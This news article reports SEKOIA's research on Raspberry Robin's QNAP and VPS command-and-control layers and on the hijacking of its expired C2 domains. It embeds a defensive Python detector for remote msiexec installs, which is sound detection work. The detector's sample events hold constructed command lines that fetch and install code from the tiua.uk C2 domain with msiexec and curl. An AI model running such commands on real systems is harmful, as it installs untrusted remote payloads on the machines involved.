February 7, 2023

Jan 11, 2023 | Ravie Lakshmanan | Cyber Threat / Malware

A new analysis of Raspberry Robin's attack infrastructure has revealed that it is possible for other threat actors to repurpose the infections for their own malicious activities, making it an even more potent threat.

Raspberry Robin (aka QNAP worm), attributed to a threat actor dubbed DEV-0856, is malware that has increasingly come under the radar for being used in attacks aimed at finance, government, insurance, and telecom entities.

Given its use by multiple threat actors to drop a wide range of payloads such as SocGholish, Bumblebee, TrueBot, IcedID, and LockBit ransomware, it is suspected to be a pay-per-install (PPI) botnet capable of serving next-stage payloads.

Raspberry Robin, notably, employs infected USB drives as a propagation mechanism and leverages breached QNAP network-attached storage (NAS) devices as first-level command-and-control (C2).

Cybersecurity firm SEKOIA said it was able to identify at least eight virtual private servers (VPSs) hosted on Linode that function as a second C2 layer and likely act as forward proxies to the next, as-yet-unknown tier.


"Each compromised QNAP seems to act as a validator and forwarder," the France-based company said. "If the received request is valid, it is redirected to an upper level of infrastructure."

The attack chain thus unfolds as follows: when a user inserts the USB drive and launches a Windows shortcut (.LNK) file, the msiexec utility is launched, which, in turn, downloads the main obfuscated Raspberry Robin payload from the QNAP instance.

This reliance on msiexec to send out HTTP requests to fetch the malware makes it possible to hijack such requests and serve a different rogue MSI payload, either through DNS hijacking attacks or by purchasing previously known C2 domains after they expire. Because the package is fetched over plain HTTP, whoever controls name resolution for the C2 domain, or the domain itself, controls what msiexec installs on the infected host.
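The delivery step in the two paragraphs above (a shortcut launches msiexec, which pulls the MSI over HTTP from the C2 host) is what an endpoint detection can key on. The following Python is an added example and not code from SEKOIA or from the article: it flags process-creation events in which msiexec.exe installs a package from a remote URL, and weights the alert by a silent-install flag, a user-facing launcher as parent process, and a non-standard port. The event fields, the allow-list host sccm.corp.example, and every sample command line are constructed for illustration; only the tiua.uk domain comes from the article.

```python
"""Detection logic for the Raspberry Robin delivery step described above:
msiexec.exe launched to install an MSI package fetched from a remote URL.
Added example; the event format and sample records are constructed."""
import re
from urllib.parse import urlsplit

# Assumed per-organisation allow-list of hosts that legitimately serve MSI
# packages to msiexec (e.g. a software-distribution server). Adjust locally.
ALLOWED_PACKAGE_HOSTS = {"sccm.corp.example"}

# Launchers a user-clicked .LNK typically spawns msiexec from.
USER_LAUNCHERS = {"explorer.exe", "cmd.exe", "powershell.exe", "rundll32.exe"}

URL_RE = re.compile(r"""(?:^|[\s"'])((?:https?|ftp)://[^\s"']+)""", re.IGNORECASE)
QUIET_RE = re.compile(r"(?:^|\s)[/-]q(?:n|b|r|f)?\b", re.IGNORECASE)


def _basename(path):
    """Return the lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def msiexec_remote_install(event):
    """Return an alert dict if `event` is msiexec installing a package from a
    remote URL that is not on the allow-list; otherwise return None.

    `event` is a process-creation record with the fields 'image' (full path of
    the new process), 'cmdline' and 'parent' (full path of the parent image),
    i.e. the subset of a Sysmon Event ID 1 record this check needs."""
    if _basename(event.get("image", "")) != "msiexec.exe":
        return None
    cmdline = event.get("cmdline", "")
    match = URL_RE.search(cmdline)
    if match is None:
        return None  # local .msi path, or an admin command such as /unregister
    url = match.group(1)
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if host in ALLOWED_PACKAGE_HOSTS:
        return None
    reasons = ["package fetched from remote URL"]
    if QUIET_RE.search(cmdline):
        reasons.append("silent install (/q)")
    parent = _basename(event.get("parent", ""))
    if parent in USER_LAUNCHERS:
        reasons.append(f"spawned by {parent}")
    if parts.port not in (None, 80, 443):
        reasons.append(f"non-standard port {parts.port}")
    return {"host": host, "url": url, "parent": parent,
            "score": len(reasons), "reasons": reasons}


def scan(events):
    """Run the check over an iterable of events and return the alerts raised."""
    return [a for a in (msiexec_remote_install(e) for e in events) if a]


# Constructed sample events. The first mimics the chain on this page
# (shortcut -> cmd -> msiexec -> HTTP download from the tiua.uk C2); the URL
# path and the remaining records are invented for illustration.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec /Q /I "http://tiua.uk/example/DESKTOP-AB12CD"'},
    {"parent": r"C:\Windows\CCM\CcmExec.exe",            # allow-listed source
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i http://sccm.corp.example/pkgs/7zip.msi /qn"},
    {"parent": r"C:\Windows\explorer.exe",               # local package, benign
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "C:\Users\alice\Downloads\tool.msi"'},
    {"parent": r"C:\Windows\explorer.exe",               # not msiexec at all
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c curl http://tiua.uk/not-msiexec"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The allow-list is what keeps this from firing on legitimate software distribution, so it has to be maintained deliberately. Note that the check cannot tell the original operators' C2 from a hijacked or re-registered domain; that is exactly the article's point, and it is why the detection keys on the behaviour of msiexec rather than on any particular domain.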

One such domain is tiua[.]uk, which was registered in the early days of the campaign in late July 2021 and used as a C2 between September 22, 2021, and November 30, 2022, when it was suspended by the .UK registry.

"By pointing this domain to our sinkhole, we were able to obtain telemetry from one of the first domains used by Raspberry Robin operators," the company said, adding that it observed several victims, indicating "it was still possible to repurpose a Raspberry Robin domain for malicious activities."

The exact origins of the first wave of Raspberry Robin USB infections currently remain unknown, although it is suspected that it may have relied on other malware to disseminate the worm.


This hypothesis is supported by the presence of a .NET spreader module that is said to be responsible for distributing Raspberry Robin .LNK files from infected hosts to USB drives. These .LNK files subsequently compromise other machines via the method described above.

The development comes days after Google's Mandiant disclosed that the Russia-linked Turla group reused expired domains associated with the ANDROMEDA malware to deliver reconnaissance and backdoor tools to targets in Ukraine that had been compromised by the latter.

"Botnets serve multiple purposes and can be reused and/or reworked by their operators or even hijacked by other groups over time," the researchers said.
